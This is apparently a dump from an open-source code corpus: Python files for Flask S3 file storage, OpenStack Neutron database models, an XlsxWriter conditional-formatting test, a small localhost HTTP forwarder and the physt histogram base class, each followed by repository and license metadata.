#self.abs_img_path = '{}/{}'.format(self.s3.meta.endpoint_url, self.bucket_name)
if self.bucket_name not in buckets:
self.s3.create_bucket(Bucket=self.bucket_name)
self.bucket = self.s3_res.Bucket(self.bucket_name)
def get_existing_files(self):
return [f.key for f in self.bucket.objects.all()]
def store(self, filename, file_data):
filename = secure_filename(filename)
if self.snake_case:
filename = convert_to_snake_case(filename)
if self._exists(filename):
raise StorageExists()
if self.all_allowed or any(filename.endswith('.' + x) for x in self.allowed):
self.s3.put_object(Bucket=self.bucket_name,
Key=filename,
Body=file_data,
ACL=self.acl)
else:
raise StorageNotAllowed()
return filename
def get_base_path(self):
return '{}/{}/'.format(self.s3.meta.endpoint_url, self.bucket_name)
def delete(self, filename):
if not self._exists(filename):
raise StorageNotExists()
else:
self.s3.delete_object(Bucket=self.bucket_name,
Key=filename)
def _exists(self, filename):
objs = list(self.bucket.objects.filter(Prefix=filename))
if len(objs) > 0 and objs[0].key == filename:
return True
else:
return False
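# Hedged usage sketch (assumes configured AWS credentials and a Flask app
# whose config supplies FILEUPLOAD_S3_BUCKET / FILEUPLOAD_S3_ACL; `app`
# and the byte payload are illustrative):
#
#     storage = S3Storage(app)
#     name = storage.store("report.pdf", b"%PDF-1.4 ...")
#     url = storage.get_base_path() + name
#     storage.delete(name)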
| Speedy1991/Flask-FileUpload | flask_fileupload/storage/s3storage.py | Python | mit | 2,266 |
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy import sql
from neutron.api.v2 import attributes as attr
from neutron.common import constants
from neutron.db import agentschedulers_db as agt
from neutron.db import model_base
from neutron.db import rbac_db_models
# NOTE(kevinbenton): these are here for external projects that expect them
# to be found in this module.
HasTenant = model_base.HasTenant
HasId = model_base.HasId
HasStatusDescription = model_base.HasStatusDescription
class IPAvailabilityRange(model_base.BASEV2):
"""Internal representation of available IPs for Neutron subnets.
Allocation - first entry from the range will be allocated.
If the first entry is equal to the last entry then this row
will be deleted.
Recycling ips involves reading the IPAllocationPool and IPAllocation tables
and inserting ranges representing available ips. This happens after the
final allocation is pulled from this table and a new ip allocation is
requested. Any contiguous ranges of available ips will be inserted as a
single range.
"""
allocation_pool_id = sa.Column(sa.String(36),
sa.ForeignKey('ipallocationpools.id',
ondelete="CASCADE"),
nullable=False,
primary_key=True)
first_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
last_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
__table_args__ = (
sa.UniqueConstraint(
first_ip, allocation_pool_id,
name='uniq_ipavailabilityranges0first_ip0allocation_pool_id'),
sa.UniqueConstraint(
last_ip, allocation_pool_id,
name='uniq_ipavailabilityranges0last_ip0allocation_pool_id'),
model_base.BASEV2.__table_args__
)
def __repr__(self):
return "%s - %s" % (self.first_ip, self.last_ip)
class IPAllocationPool(model_base.BASEV2, HasId):
"""Representation of an allocation pool in a Neutron subnet."""
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=True)
first_ip = sa.Column(sa.String(64), nullable=False)
last_ip = sa.Column(sa.String(64), nullable=False)
available_ranges = orm.relationship(IPAvailabilityRange,
backref='ipallocationpool',
lazy="select",
cascade='all, delete-orphan')
def __repr__(self):
return "%s - %s" % (self.first_ip, self.last_ip)
class IPAllocation(model_base.BASEV2):
"""Internal representation of allocated IP addresses in a Neutron subnet.
"""
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete="CASCADE"),
nullable=True)
ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=False, primary_key=True)
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id",
ondelete="CASCADE"),
nullable=False, primary_key=True)
class Route(object):
"""mixin of a route."""
destination = sa.Column(sa.String(64), nullable=False, primary_key=True)
nexthop = sa.Column(sa.String(64), nullable=False, primary_key=True)
class Forwarding(object):
"""mixin of a forwarding."""
outside_port = sa.Column(sa.Integer(), nullable=False, primary_key=True)
inside_addr = sa.Column(sa.String(15), nullable=False, primary_key=True)
inside_port = sa.Column(sa.Integer(), nullable=False, primary_key=True)
protocol = sa.Column(sa.String(4), nullable=False, primary_key=True)
class SubnetRoute(model_base.BASEV2, Route):
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
class Port(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a port on a Neutron v2 network."""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id"),
nullable=False)
fixed_ips = orm.relationship(IPAllocation, backref='port', lazy='joined',
cascade='all, delete-orphan')
mac_address = sa.Column(sa.String(32), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
status = sa.Column(sa.String(16), nullable=False)
device_id = sa.Column(sa.String(attr.DEVICE_ID_MAX_LEN), nullable=False)
device_owner = sa.Column(sa.String(attr.DEVICE_OWNER_MAX_LEN),
nullable=False)
dns_name = sa.Column(sa.String(255), nullable=True)
__table_args__ = (
sa.Index(
'ix_ports_network_id_mac_address', 'network_id', 'mac_address'),
sa.Index(
'ix_ports_network_id_device_owner', 'network_id', 'device_owner'),
sa.UniqueConstraint(
network_id, mac_address,
name='uniq_ports0network_id0mac_address'),
model_base.BASEV2.__table_args__
)
def __init__(self, id=None, tenant_id=None, name=None, network_id=None,
mac_address=None, admin_state_up=None, status=None,
device_id=None, device_owner=None, fixed_ips=None,
dns_name=None, **kwargs):
super(Port, self).__init__(**kwargs)
self.id = id
self.tenant_id = tenant_id
self.name = name
self.network_id = network_id
self.mac_address = mac_address
self.admin_state_up = admin_state_up
self.device_owner = device_owner
self.device_id = device_id
self.dns_name = dns_name
# Since this is a relationship only set it if one is passed in.
if fixed_ips:
self.fixed_ips = fixed_ips
        # NOTE(arosen): status must be set last, as an event is triggered on
        # status changes.
self.status = status
class DNSNameServer(model_base.BASEV2):
"""Internal representation of a DNS nameserver."""
address = sa.Column(sa.String(128), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
order = sa.Column(sa.Integer, nullable=False, server_default='0')
class Subnet(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a neutron subnet.
When a subnet is created the first and last entries will be created. These
are used for the IP allocation.
"""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id'))
subnetpool_id = sa.Column(sa.String(36), index=True)
# NOTE: Explicitly specify join conditions for the relationship because
# subnetpool_id in subnet might be 'prefix_delegation' when the IPv6 Prefix
# Delegation is enabled
subnetpool = orm.relationship(
'SubnetPool', lazy='joined',
foreign_keys='Subnet.subnetpool_id',
primaryjoin='Subnet.subnetpool_id==SubnetPool.id')
ip_version = sa.Column(sa.Integer, nullable=False)
cidr = sa.Column(sa.String(64), nullable=False)
gateway_ip = sa.Column(sa.String(64))
allocation_pools = orm.relationship(IPAllocationPool,
backref='subnet',
lazy="joined",
cascade='delete')
enable_dhcp = sa.Column(sa.Boolean())
dns_nameservers = orm.relationship(DNSNameServer,
backref='subnet',
cascade='all, delete, delete-orphan',
order_by=DNSNameServer.order,
lazy='joined')
routes = orm.relationship(SubnetRoute,
backref='subnet',
cascade='all, delete, delete-orphan',
lazy='joined')
ipv6_ra_mode = sa.Column(sa.Enum(constants.IPV6_SLAAC,
constants.DHCPV6_STATEFUL,
constants.DHCPV6_STATELESS,
name='ipv6_ra_modes'), nullable=True)
ipv6_address_mode = sa.Column(sa.Enum(constants.IPV6_SLAAC,
constants.DHCPV6_STATEFUL,
constants.DHCPV6_STATELESS,
name='ipv6_address_modes'), nullable=True)
# subnets don't have their own rbac_entries, they just inherit from
# the network rbac entries
rbac_entries = orm.relationship(
rbac_db_models.NetworkRBAC, lazy='joined', uselist=True,
foreign_keys='Subnet.network_id',
primaryjoin='Subnet.network_id==NetworkRBAC.object_id')
class SubnetPoolPrefix(model_base.BASEV2):
"""Represents a neutron subnet pool prefix
"""
__tablename__ = 'subnetpoolprefixes'
cidr = sa.Column(sa.String(64), nullable=False, primary_key=True)
subnetpool_id = sa.Column(sa.String(36),
sa.ForeignKey('subnetpools.id',
ondelete='CASCADE'),
nullable=False,
primary_key=True)
class SubnetPool(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a neutron subnet pool.
"""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
ip_version = sa.Column(sa.Integer, nullable=False)
default_prefixlen = sa.Column(sa.Integer, nullable=False)
min_prefixlen = sa.Column(sa.Integer, nullable=False)
max_prefixlen = sa.Column(sa.Integer, nullable=False)
shared = sa.Column(sa.Boolean, nullable=False)
is_default = sa.Column(sa.Boolean, nullable=False,
server_default=sql.false())
default_quota = sa.Column(sa.Integer, nullable=True)
hash = sa.Column(sa.String(36), nullable=False, server_default='')
address_scope_id = sa.Column(sa.String(36), nullable=True)
prefixes = orm.relationship(SubnetPoolPrefix,
backref='subnetpools',
cascade='all, delete, delete-orphan',
lazy='joined')
class Network(model_base.HasStandardAttributes, model_base.BASEV2,
HasId, HasTenant):
"""Represents a v2 neutron network."""
name = sa.Column(sa.String(attr.NAME_MAX_LEN))
ports = orm.relationship(Port, backref='networks')
subnets = orm.relationship(
Subnet, backref=orm.backref('networks', lazy='joined'),
lazy="joined")
status = sa.Column(sa.String(16))
admin_state_up = sa.Column(sa.Boolean)
mtu = sa.Column(sa.Integer, nullable=True)
vlan_transparent = sa.Column(sa.Boolean, nullable=True)
rbac_entries = orm.relationship(rbac_db_models.NetworkRBAC,
backref='network', lazy='joined',
cascade='all, delete, delete-orphan')
availability_zone_hints = sa.Column(sa.String(255))
dhcp_agents = orm.relationship(
'Agent', lazy='joined', viewonly=True,
secondary=agt.NetworkDhcpAgentBinding.__table__)
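# Illustrative sketch (not part of the original module): how the eagerly
# joined relationships above can be traversed once a session exists. The
# `session` and `net_id` names here are assumptions for the example.
#
#     net = session.query(Network).filter_by(id=net_id).one()
#     for subnet in net.subnets:      # lazy='joined' => loaded eagerly
#         print(subnet.cidr, subnet.gateway_ip, len(subnet.allocation_pools))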
| MaximNevrov/neutron | neutron/db/models_v2.py | Python | apache-2.0 | 12,581 |
from ._terminator import Terminator
__all__ = ("Terminator",)
| nikitanovosibirsk/vedro | vedro/plugins/terminator/__init__.py | Python | apache-2.0 | 63 |
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2022, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
"""
Test assembling a complete Worksheet file.
"""
def test_assemble_xml_file(self):
"""Test writing a worksheet with conditional formatting."""
self.maxDiff = None
fh = StringIO()
worksheet = Worksheet()
worksheet._set_filehandle(fh)
worksheet.select()
worksheet.index = 0
worksheet.conditional_format('A1',
{'type': 'data_bar',
'data_bar_2010': True,
'min_type': 'formula',
'min_value': '=$B$1',
})
worksheet.conditional_format('A2:B2',
{'type': 'data_bar',
'bar_color': '#63C384',
'data_bar_2010': True,
'min_type': 'formula',
'min_value': '=$B$1',
'max_type': 'formula',
'max_value': '=$C$1',
})
worksheet.conditional_format('A3:C3',
{'type': 'data_bar',
'bar_color': '#FF555A',
'data_bar_2010': True,
'min_type': 'percentile',
'max_type': 'percentile',
'min_value': 10,
'max_value': 90,
})
worksheet._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
<dimension ref="A1"/>
<sheetViews>
<sheetView tabSelected="1" workbookViewId="0"/>
</sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<sheetData/>
<conditionalFormatting sqref="A1">
<cfRule type="dataBar" priority="1">
<dataBar>
<cfvo type="formula" val="$B$1"/>
<cfvo type="max"/>
<color rgb="FF638EC6"/>
</dataBar>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
<x14:id>{DA7ABA51-AAAA-BBBB-0001-000000000001}</x14:id>
</ext>
</extLst>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A2:B2">
<cfRule type="dataBar" priority="2">
<dataBar>
<cfvo type="formula" val="$B$1"/>
<cfvo type="formula" val="$C$1"/>
<color rgb="FF63C384"/>
</dataBar>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
<x14:id>{DA7ABA51-AAAA-BBBB-0001-000000000002}</x14:id>
</ext>
</extLst>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A3:C3">
<cfRule type="dataBar" priority="3">
<dataBar>
<cfvo type="percentile" val="10"/>
<cfvo type="percentile" val="90"/>
<color rgb="FFFF555A"/>
</dataBar>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
<x14:id>{DA7ABA51-AAAA-BBBB-0001-000000000003}</x14:id>
</ext>
</extLst>
</cfRule>
</conditionalFormatting>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{78C0D931-6437-407d-A8EE-F0AAD7539E65}">
<x14:conditionalFormattings>
<x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:cfRule type="dataBar" id="{DA7ABA51-AAAA-BBBB-0001-000000000001}">
<x14:dataBar minLength="0" maxLength="100" border="1" negativeBarBorderColorSameAsPositive="0">
<x14:cfvo type="formula">
<xm:f>$B$1</xm:f>
</x14:cfvo>
<x14:cfvo type="autoMax"/>
<x14:borderColor rgb="FF638EC6"/>
<x14:negativeFillColor rgb="FFFF0000"/>
<x14:negativeBorderColor rgb="FFFF0000"/>
<x14:axisColor rgb="FF000000"/>
</x14:dataBar>
</x14:cfRule>
<xm:sqref>A1</xm:sqref>
</x14:conditionalFormatting>
<x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:cfRule type="dataBar" id="{DA7ABA51-AAAA-BBBB-0001-000000000002}">
<x14:dataBar minLength="0" maxLength="100" border="1" negativeBarBorderColorSameAsPositive="0">
<x14:cfvo type="formula">
<xm:f>$B$1</xm:f>
</x14:cfvo>
<x14:cfvo type="formula">
<xm:f>$C$1</xm:f>
</x14:cfvo>
<x14:borderColor rgb="FF63C384"/>
<x14:negativeFillColor rgb="FFFF0000"/>
<x14:negativeBorderColor rgb="FFFF0000"/>
<x14:axisColor rgb="FF000000"/>
</x14:dataBar>
</x14:cfRule>
<xm:sqref>A2:B2</xm:sqref>
</x14:conditionalFormatting>
<x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:cfRule type="dataBar" id="{DA7ABA51-AAAA-BBBB-0001-000000000003}">
<x14:dataBar minLength="0" maxLength="100" border="1" negativeBarBorderColorSameAsPositive="0">
<x14:cfvo type="percentile">
<xm:f>10</xm:f>
</x14:cfvo>
<x14:cfvo type="percentile">
<xm:f>90</xm:f>
</x14:cfvo>
<x14:borderColor rgb="FFFF555A"/>
<x14:negativeFillColor rgb="FFFF0000"/>
<x14:negativeBorderColor rgb="FFFF0000"/>
<x14:axisColor rgb="FF000000"/>
</x14:dataBar>
</x14:cfRule>
<xm:sqref>A3:C3</xm:sqref>
</x14:conditionalFormatting>
</x14:conditionalFormattings>
</ext>
</extLst>
</worksheet>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
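        # Note (illustrative): the 'data_bar_2010' option used above makes the
        # worksheet emit both the classic <dataBar> rule and the Excel 2010
        # <x14:dataBar> extension, which is why each rule id of the form
        # {DA7ABA51-...} appears twice in the expected XML.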
| jmcnamara/XlsxWriter | xlsxwriter/test/worksheet/test_data_bar11.py | Python | bsd-2-clause | 8,784 |
import requests
import json
import logging
LOG = logging.getLogger(__name__)
class Forwarder(object):
def __init__(self):
        self.fwd_url = 'http://localhost:9999/forward'
def forward(self, reason, host=None, data=None):
body = {
'reason': reason
}
if host is not None:
body['host'] = host
if data is not None:
body['data'] = data
        resp = requests.post(self.fwd_url,
                             data=json.dumps(body))
        return resp
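if __name__ == '__main__':
    # Minimal usage sketch (illustrative): assumes a listener is running on
    # the forward endpoint configured above.
    fwd = Forwarder()
    fwd.forward('sample_reason', host='localhost', data={'key': 'value'})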
| dscottcs/superluminal | superluminal/sample/forward_sample.py | Python | apache-2.0 | 510 |
"""HistogramBase - base for all histogram classes."""
from __future__ import annotations
import abc
import warnings
from typing import TYPE_CHECKING, cast
import numpy as np
from physt.binnings import BinningBase, as_binning
from physt.config import config
from physt.statistics import INVALID_STATISTICS
if TYPE_CHECKING:
from typing import (
Any,
ClassVar,
Collection,
Dict,
Iterable,
List,
Mapping,
Optional,
Tuple,
Type,
TypeVar,
Union,
)
import physt
from physt.binnings import BinningLike
from physt.typing_aliases import ArrayLike, Axis, DTypeLike
HistogramType = TypeVar("HistogramType", bound="HistogramBase")
# Various platforms have different default floating point dtypes.
_FREQUENCY_SUPPORTED_DTYPES: List[Type[np.number]] = [
np.int16,
np.int32, # Default in Windows
np.int64, # Default in 64-bit Linux
np.float16,
np.float32,
np.float64,
]
if hasattr(np, "float128"):
# Not present in Windows
_FREQUENCY_SUPPORTED_DTYPES.append(np.float128) # type: ignore
class HistogramBase(abc.ABC):
"""Histogram base class.
Behaviour shared by all histogram classes.
The most important daughter classes are:
- Histogram1D
- HistogramND
There are also special histogram types that are modifications of these classes.
The methods you should override:
- fill
- fill_n (optional)
- copy
- _update_dict (optional)
Underlying data type is int64 / float or an explicitly specified
other type (dtype).
Attributes
----------
_binnings : Schema for binning(s)
frequencies : np.ndarray
Bin contents
errors2 : np.ndarray
Square errors associated with the bin contents
_meta_data : dict
All meta-data (names, user-custom values, ...). Anything can be put in.
When exported, all information is kept.
_dtype : np.dtype
Type of the frequencies and also errors (int64, float64 or user-overridden)
_missed : array_like
Various storage for missed values in different histogram types
(1 value for multi-dimensional, 3 values for one-dimensional)
Invariants
----------
- Frequencies in the histogram should always be non-negative.
Many operations rely on that, but it is not always enforced.
      (If you set config.free_arithmetics (see below), negative frequencies
      are also allowed.)
Arithmetics
-----------
Histograms offer standard arithmetic operators that by default allow only
meaningful application (i.e. addition / subtraction of two histograms
with matching or mutually adaptable bin sets, multiplication and division by a constant).
    If you relax the criteria by setting `config.free_arithmetics` or inside
the config.enable_free_arithmetics() context manager, you are in addition
allowed to use any array-like with matching shape.
See Also
--------
histogram1d
histogram_nd
special
"""
def __init__(
self,
binnings: Iterable[BinningLike],
frequencies: Optional[ArrayLike] = None,
errors2: Optional[ArrayLike] = None,
*,
axis_names: Optional[Iterable[str]] = None,
dtype: Optional[DTypeLike] = None,
keep_missed: bool = True,
**kwargs,
):
"""Constructor
All keyword arguments not listed below become items in the _meta_data
dictionary.
Parameters
----------
        binnings : Iterable of something that can be turned into binnings
frequencies : Frequencies to fill bins with (default to zeros if not present)
errors2 : Squared errors for bins (default is equal to frequencies)
dtype : Dtype for bin contents
        keep_missed : If True, keep information about values that did not hit any bin
"""
self._binnings = [as_binning(binning) for binning in binnings]
new_kwargs = self.default_init_values.copy()
new_kwargs.update(kwargs)
kwargs = new_kwargs
# Frequencies + appropriate dtypes
if frequencies is None:
dtype = dtype or np.int64
self._frequencies = np.zeros(self.shape, dtype=dtype)
else:
if dtype is not None:
frequencies = np.asarray(frequencies, dtype=dtype)
else:
frequencies = np.asarray(frequencies)
if frequencies.dtype in self.SUPPORTED_DTYPES:
pass # OK
elif np.issubdtype(frequencies.dtype, np.integer):
frequencies = frequencies.astype(np.int64)
elif np.issubdtype(frequencies.dtype, np.floating):
frequencies = frequencies.astype(np.float64)
else:
raise ValueError(f"Frequencies of type {frequencies.dtype} not understood")
dtype = frequencies.dtype
self.frequencies = frequencies
self._dtype, _ = self._eval_dtype(dtype) # type: ignore
# Errors
if errors2 is None:
self.errors2 = abs(self._frequencies.copy())
else:
self.errors2 = np.asarray(errors2, dtype=self.dtype)
self.keep_missed = keep_missed
# Note: missed are dealt differently in 1D/ND cases
self._meta_data = kwargs.copy()
self.axis_names = tuple(axis_names or self.default_axis_names)
# "Protected" attributes
_binnings: List[BinningBase]
_frequencies: np.ndarray
_errors2: np.ndarray
_missed: np.ndarray
SUPPORTED_DTYPES: ClassVar[Collection[Type[np.number]]] = tuple(_FREQUENCY_SUPPORTED_DTYPES)
@property
def default_axis_names(self) -> List[str]:
"""Axis names to be used when an instance does not define them."""
return [f"axis{i}" for i in range(self.ndim)]
default_init_values: Dict[str, Any] = {}
@property
def meta_data(self) -> Dict[str, Any]:
"""A dictionary of non-numerical information about the histogram.
It contains several pre-defined ones, but you can add any other.
These are preserved when saving and also in operations.
"""
return self._meta_data
@property
def name(self) -> Optional[str]:
"""Name of the histogram (stored in meta-data)."""
return self._meta_data.get("name", None)
@name.setter
def name(self, value: str):
"""Name of the histogram.
In plotting, this will be used as label.
"""
self._meta_data["name"] = str(value)
@property
def title(self) -> Optional[str]:
"""Title of the histogram to be displayed when plotted (stored in meta-data).
If not specified, defaults to `name`.
"""
return self._meta_data.get("title", self.name)
@title.setter
def title(self, value: str):
"""Title of the histogram.
In plotting, this will be used as plot title.
"""
self._meta_data["title"] = str(value)
@property
def axis_names(self) -> Tuple[str, ...]:
"""Names of axes (stored in meta-data)."""
default = [f"axis{i}" for i in range(self.ndim)]
return tuple(self._meta_data.get("axis_names", None) or default)
@axis_names.setter
def axis_names(self, value: Iterable[str]):
# TODO: Check dimension for this
self._meta_data["axis_names"] = tuple(str(name) for name in value)
def _get_axis(self, name_or_index: Axis) -> int:
"""Get a zero-based index of an axis and check its existence."""
# TODO: Add unit test
if isinstance(name_or_index, int):
if name_or_index < 0 or name_or_index >= self.ndim:
raise ValueError(f"No axis {name_or_index}, must be from 0 to {self.ndim - 1}")
return name_or_index
if isinstance(name_or_index, str):
if name_or_index not in self.axis_names:
named_axes = [name for name in self.axis_names if name]
                raise ValueError(
                    f"No axis with such name: {name_or_index}, available names: "
                    + ", ".join(named_axes)
                    + ". In most places, you can also use numbers."
                )
return self.axis_names.index(name_or_index)
raise TypeError(
f"Argument of type {type(name_or_index)} not understood, int or str expected."
)
@property
def shape(self) -> Tuple[int, ...]:
"""Shape of histogram's data.
Returns
-------
Tuple with the number of bins along each axis.
"""
return tuple(bins.bin_count for bins in self._binnings)
@property
def ndim(self) -> int:
"""Dimensionality of histogram's data.
i.e. the number of axes along which we bin the values.
"""
return len(self._binnings)
@classmethod
def _eval_dtype(cls, value: DTypeLike) -> Tuple[np.dtype, Union[np.iinfo, np.finfo]]:
"""Convert dtype into canonical form, check its applicability and return info.
Parameters
----------
value: Anything convertible to dtype
Returns
-------
value: Numpy dtype
type_info: Information about the dtype
"""
dtype: np.dtype = np.dtype(value)
if dtype.kind in "iu":
type_info: Union[np.iinfo, np.finfo] = np.iinfo(dtype)
elif dtype.kind == "f":
type_info = np.finfo(dtype)
else:
raise ValueError("Unsupported dtype. Only integer/floating-point types are supported.")
return dtype, type_info
@property
def dtype(self) -> np.dtype:
"""Data type of the bin contents."""
return self._dtype
@dtype.setter
def dtype(self, value: DTypeLike) -> None:
self.set_dtype(value)
def set_dtype(self, value: DTypeLike, *, check: bool = True) -> None:
"""Change data type of the bin contents.
Allowed conversions:
- from integral to float types
- between the same category of type (float/integer)
- from float types to integer if weights are trivial
Parameters
----------
value: np.dtype or something convertible to it.
check: If True (default), all values are checked against the limits
"""
# TODO? Deal with unsigned types
value, type_info = self._eval_dtype(value)
if value == self._dtype:
return
if self.dtype is None or np.can_cast(self.dtype, value):
pass # Ok
elif check:
if np.issubdtype(value, np.integer):
if self.dtype.kind == "f":
for array in (self.frequencies, self.errors2):
if np.any(array % 1.0):
raise ValueError("Data contain non-integer values.")
for array in (self.frequencies, self.errors2):
if np.any((array > type_info.max) | (array < type_info.min)):
raise ValueError("Data contain values outside the specified range.")
self._dtype = value
self._frequencies = self._frequencies.astype(value)
if self._errors2 is not None:
self._errors2 = self._errors2.astype(value)
if self._missed is not None:
self._missed = self._missed.astype(value)
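    # Usage sketch (illustrative): widening to float always works; narrowing
    # back to an integer dtype succeeds only if all frequencies are integral
    # and within range (verified above when check=True):
    #
    #     hist.set_dtype(np.float64)
    #     hist.set_dtype(np.int64)   # may raise ValueError on fractional data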
def _coerce_dtype(self, other_dtype: DTypeLike) -> None:
"""Possibly change the bin content type to allow correct operations with other operand.
Parameters
----------
other_dtype : np.dtype or type
"""
other_dtype, _ = self._eval_dtype(other_dtype)
if self._dtype is None:
new_dtype = np.dtype(other_dtype)
else:
new_dtype = np.find_common_type([self._dtype, np.dtype(other_dtype)], [])
if new_dtype != self.dtype:
self.set_dtype(new_dtype)
@property
def bin_count(self) -> int:
"""Total number of bins."""
# TODO: Rename to size (in parallel with numpy/pandas)?
return int(np.product(self.shape))
@property
def frequencies(self) -> np.ndarray:
"""Frequencies (values, contents) of the histogram bins."""
return self._frequencies
@frequencies.setter
def frequencies(self, values: ArrayLike) -> None:
frequencies = np.asarray(values)
if frequencies.shape != self.shape:
raise ValueError("Values must have same dimension as bins.")
if np.any(frequencies < 0):
if config.free_arithmetics:
warnings.warn("Negative frequencies in the histogram.")
else:
raise ValueError("Cannot have negative frequencies.")
self._frequencies = frequencies
@property
def densities(self) -> np.ndarray:
"""Frequencies normalized by bin sizes.
Useful when bins are not of the same size.
"""
return self._frequencies / self.bin_sizes
@property
@abc.abstractmethod
def bin_sizes(self) -> np.ndarray:
raise NotImplementedError
def normalize(self, inplace: bool = False, percent: bool = False) -> "HistogramBase":
"""Normalize the histogram, so that the total weight is equal to 1.
Parameters
----------
inplace: If True, updates itself. If False (default), returns copy
percent: If True, normalizes to percent instead of 1. Default: False
Returns
-------
either modified copy or self
See also
--------
densities
HistogramND.partial_normalize
"""
if inplace:
self /= self.total * (0.01 if percent else 1)
return self
else:
return self / self.total * (100 if percent else 1)
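    # Usage sketch (illustrative):
    #
    #     normalized = hist.normalize()     # new histogram with total == 1.0
    #     hist.normalize(inplace=True)      # mutates hist itself
    #     hist.normalize(percent=True)      # copy whose total == 100.0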
@property
def errors2(self) -> np.ndarray:
"""Squares of the bin errors."""
return self._errors2
@errors2.setter
def errors2(self, values: ArrayLike) -> None:
array: np.ndarray = np.asarray(values)
if array.shape != self.shape:
raise ValueError("Square errors must have same dimension as bins.")
if np.any(array < 0):
raise ValueError("Cannot have negative square errors.")
self._errors2 = array
@property
def errors(self) -> np.ndarray:
"""Bin errors."""
return np.sqrt(self.errors2)
@property
def total(self) -> float:
"""Total number (sum of weights) of entries excluding underflow and overflow."""
return self._frequencies.sum().item()
@property
def missed(self) -> float:
"""Total number (weight) of entries that missed the bins."""
return self._missed.sum().item()
def is_adaptive(self) -> bool:
"""Whether the binning can be changed with operations."""
# TODO: remove in favour of adaptive property
return all(binning.is_adaptive() for binning in self._binnings)
def set_adaptive(self, value: bool = True):
"""Change the histogram binning to (non)adaptive.
This requires binning in all dimensions to allow this.
"""
# TODO: remove in favour of adaptive property
if not all(b.adaptive_allowed for b in self._binnings):
raise ValueError("All binnings must allow adaptive behaviour.")
for binning in self._binnings:
binning.set_adaptive(value)
@property
def adaptive(self) -> bool:
# TODO: Remove?
return self.is_adaptive()
@adaptive.setter
def adaptive(self, value: bool):
self.set_adaptive(value)
def _change_binning(
self,
new_binning: BinningBase,
bin_map: Iterable[Tuple[int, int]],
axis: Axis = 0,
):
"""Set new binnning and update the bin contents according to a map.
Fills frequencies and errors with 0.
It's the caller's responsibility to provide correct binning and map.
Parameters
----------
new_binning: physt.binnings.BinningBase
bin_map: Tuples containing bin indices (old, new)
        axis: What axis does the binning describe (0..ndim-1)
"""
axis = self._get_axis(axis)
self._reshape_data(new_binning.bin_count, bin_map, axis)
self._binnings[axis] = new_binning
def merge_bins(
self: "HistogramType",
amount: Optional[int] = None,
*,
min_frequency: Optional[float] = None,
axis: Optional[Axis] = None,
inplace: bool = False,
) -> "HistogramType":
"""Reduce the number of bins and add their content:
Parameters
----------
amount: How many adjacent bins to join together.
        min_frequency: Try to have at least this value in each bin
            (this is not enforced, e.g., for minima between high bins)
axis: On which axis to do this (None => all)
inplace: Whether to modify this histogram or return a new one
"""
if not inplace:
histogram = self.copy()
histogram.merge_bins(amount, min_frequency=min_frequency, axis=axis, inplace=True)
return histogram
elif axis is None:
for i in range(self.ndim):
self.merge_bins(amount=amount, min_frequency=min_frequency, axis=i, inplace=True)
else:
